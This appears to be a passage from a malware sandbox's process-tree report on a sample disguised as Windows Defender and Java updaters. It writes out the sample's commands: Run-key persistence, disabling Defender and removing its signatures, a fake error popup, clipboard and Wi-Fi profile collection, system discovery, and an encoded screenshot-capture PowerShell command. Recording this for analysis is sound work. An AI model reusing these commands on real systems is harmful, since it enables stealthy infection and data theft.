C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C0C0.tmp\C0C1.tmp\C0E1.bat C:\Windows\system32\java.exe"5⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Windows\system32\timeout.exetimeout 16⤵PID:3396
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f6⤵PID:2056
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f6⤵
- Adds Run key to start application
PID:2544
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f6⤵PID:2092
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f6⤵PID:4260
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"6⤵
- Executes dropped EXE
PID:4200 -
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3744
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1740
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
PID:4540 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D0CD.tmp\D0CE.tmp\D0CF.bat C:\Windows\system32\java.exe"7⤵
- Drops file in System32 directory
PID:2452 -
C:\Windows\system32\timeout.exetimeout 18⤵
- Delays execution with timeout.exe
PID:3708
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f8⤵PID:952
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f8⤵PID:3116
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f8⤵PID:4992
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f8⤵PID:3292
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"8⤵
- Executes dropped EXE
PID:820 -
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"9⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5292
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"8⤵
- Executes dropped EXE
PID:2992
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"8⤵
- Checks computer location settings
- Executes dropped EXE
PID:1532 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E07D.tmp\E07E.tmp\E07F.bat C:\Windows\system32\java.exe"9⤵PID:5508
-
C:\Windows\system32\timeout.exetimeout 110⤵
- Delays execution with timeout.exe
PID:5872
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f10⤵PID:4176
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f10⤵PID:4408
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f10⤵PID:5384
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f10⤵PID:5408
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"10⤵
- Executes dropped EXE
PID:5424 -
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"11⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5680
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"10⤵
- Executes dropped EXE
PID:5432
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"10⤵
- Checks computer location settings
- Executes dropped EXE
PID:2648 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EA31.tmp\EA32.tmp\EA33.bat C:\Windows\system32\java.exe"11⤵PID:5796
-
C:\Windows\system32\timeout.exetimeout 112⤵
- Delays execution with timeout.exe
PID:2972
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f12⤵PID:6116
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f12⤵PID:3592
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f12⤵
- Adds Run key to start application
PID:5204
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f12⤵PID:5240
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"12⤵
- Executes dropped EXE
PID:5212 -
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"13⤵
- Executes dropped EXE
PID:3356
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"12⤵
- Executes dropped EXE
PID:4176
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"12⤵
- Checks computer location settings
- Executes dropped EXE
PID:5260 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F117.tmp\F118.tmp\F119.bat C:\Windows\system32\java.exe"13⤵
- Drops file in System32 directory
PID:5592 -
C:\Windows\system32\timeout.exetimeout 114⤵PID:5748
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f14⤵
- Adds Run key to start application
PID:2604
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f14⤵
- Adds Run key to start application
PID:3028
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f14⤵PID:2968
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f14⤵PID:1264
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"14⤵
- Executes dropped EXE
PID:820 -
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"15⤵
- Executes dropped EXE
PID:3212
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"14⤵
- Executes dropped EXE
PID:5824
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"14⤵
- Checks computer location settings
- Executes dropped EXE
PID:5672 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F7BE.tmp\F7BF.tmp\F7C0.bat C:\Windows\system32\java.exe"15⤵PID:3188
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵PID:1276
-
-
C:\Windows\system32\timeout.exetimeout 116⤵PID:5720
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f16⤵PID:3192
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f16⤵PID:1384
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f16⤵PID:1556
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f16⤵PID:5556
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"16⤵
- Executes dropped EXE
PID:3248 -
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"17⤵
- Executes dropped EXE
PID:4788
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"16⤵
- Executes dropped EXE
PID:3400
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"16⤵
- Checks computer location settings
- Executes dropped EXE
PID:4200 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FF7E.tmp\FF7F.tmp\FF80.bat C:\Windows\system32\java.exe"17⤵PID:3356
-
C:\Windows\system32\timeout.exetimeout 118⤵
- Delays execution with timeout.exe
PID:3452
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f18⤵PID:1740
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f18⤵
- Adds Run key to start application
PID:3460
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f18⤵PID:4760
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f18⤵PID:5980
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"18⤵
- Executes dropped EXE
PID:5064 -
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"19⤵
- Executes dropped EXE
PID:5532
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"18⤵
- Executes dropped EXE
PID:4948
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"18⤵
- Checks computer location settings
- Executes dropped EXE
PID:1368 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6C1.tmp\6C2.tmp\6C3.bat C:\Windows\system32\java.exe"19⤵PID:4988
-
C:\Windows\system32\timeout.exetimeout 120⤵
- Delays execution with timeout.exe
PID:3056
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f20⤵
- Adds Run key to start application
PID:3680
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f20⤵PID:5748
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f20⤵PID:4828
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f20⤵PID:5772
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"20⤵
- Executes dropped EXE
PID:3752 -
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"21⤵
- Executes dropped EXE
PID:2252
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"20⤵
- Executes dropped EXE
PID:5148
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"20⤵
- Checks computer location settings
- Executes dropped EXE
PID:1120 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EEF.tmp\EF0.tmp\EF1.bat C:\Windows\system32\java.exe"21⤵
- Drops file in System32 directory
PID:5980 -
C:\Windows\system32\timeout.exetimeout 122⤵
- Delays execution with timeout.exe
PID:5940
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f22⤵
- Adds Run key to start application
PID:5924
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f22⤵PID:5944
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f22⤵PID:2684
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f22⤵
- Adds Run key to start application
PID:2988
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"22⤵
- Executes dropped EXE
PID:2528 -
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"23⤵
- Executes dropped EXE
PID:1824
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"22⤵
- Executes dropped EXE
PID:5660
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"22⤵
- Checks computer location settings
- Executes dropped EXE
PID:5184 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\172D.tmp\172E.tmp\172F.bat C:\Windows\system32\java.exe"23⤵
- Drops file in System32 directory
PID:5920 -
C:\Windows\system32\timeout.exetimeout 124⤵PID:636
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f24⤵PID:5396
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f24⤵PID:5760
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f24⤵PID:1576
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f24⤵PID:5628
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"24⤵
- Executes dropped EXE
PID:1640 -
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"25⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:5216 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe'"26⤵PID:1264
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV127⤵PID:5580
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe'27⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4512
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"26⤵PID:4112
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend27⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5972
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Could not open the file', 0, 'Error', 32+16);close()""26⤵PID:1528
-
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Could not open the file', 0, 'Error', 32+16);close()"27⤵PID:4992
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"26⤵PID:1736
-
C:\Windows\system32\tasklist.exetasklist /FO LIST27⤵
- Enumerates processes with tasklist
PID:736
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"26⤵PID:1740
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid27⤵PID:3348
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"26⤵PID:1468
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 227⤵PID:3408
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"26⤵PID:4408
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 227⤵PID:5636
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"26⤵PID:6032
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name27⤵
- Detects videocard installed
PID:5976
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"26⤵PID:4588
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name27⤵
- Detects videocard installed
PID:744
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"26⤵PID:2020
-
C:\Windows\system32\tasklist.exetasklist /FO LIST27⤵
- Enumerates processes with tasklist
PID:5476
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"26⤵PID:3116
-
C:\Windows\system32\tasklist.exetasklist /FO LIST27⤵
- Enumerates processes with tasklist
PID:3492
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"26⤵PID:5356
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName27⤵PID:5572
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"26⤵
- Clipboard Data
PID:1964 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard27⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:5804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"26⤵PID:640
-
C:\Windows\system32\tasklist.exetasklist /FO LIST27⤵
- Enumerates processes with tasklist
PID:5972
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"26⤵PID:2336
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV127⤵PID:6012
-
-
C:\Windows\system32\tree.comtree /A /F27⤵PID:5860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"26⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:840 -
C:\Windows\system32\netsh.exenetsh wlan show profile27⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2852
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"26⤵PID:2792
-
C:\Windows\system32\systeminfo.exesysteminfo27⤵
- Gathers system information
PID:1464
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"26⤵PID:3664
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath27⤵PID:1016
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG